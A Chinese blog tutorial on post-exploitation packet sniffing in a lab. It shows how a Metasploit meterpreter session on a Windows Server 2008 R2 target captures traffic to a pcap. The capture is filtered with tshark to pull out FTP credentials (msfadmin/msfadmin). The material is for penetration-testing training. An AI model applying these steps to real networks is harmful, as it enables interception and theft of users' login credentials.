12.4、后渗透测试--内网主机数据包流量嗅探

本文介绍如何利用Kali Linux对内网中的Windows Server 2008 R2进行流量嗅探,通过设置嗅探器捕获FTP登录凭证等敏感信息,并详细说明了每一步骤的操作方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

攻击主机: Kali 192.168.11.106
靶机:windows server 2008 r2  192.168.11.134
Metasploitable2-Linux: 192.168.11.105
当成功获取目标机器的会话后,可以使用嗅探手段获取更多信息。
前提: 获得 meterpreter shell
1、加载sniffer模块  use sniffer
  
2、查看帮助信息  help
3、查看可嗅探的网卡  sniffer_interfaces
  
4、指定网卡编号,开启嗅探  sniffer_start 2
5、查看嗅探的状态  sniffer_status 2
6、靶机上192.168.11.134操作,ftp方式登录Metasploitable2-Linux机器192.168.11.105
7、将流量保存到桌面  sniffer_dump 2 /root/Desktop/test.cap
8、wireshark打开文件test.cap,筛选可知ftp登录192.168.11.105的用户与密码是:msfadmin/msfadmin
快速筛选用户密码: tshark -r test.cap| grep -E 'PASS|USER'
9、停止嗅探与释放捕获的数据包
sniffer_stop 2
sniffer_release 2
参考:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值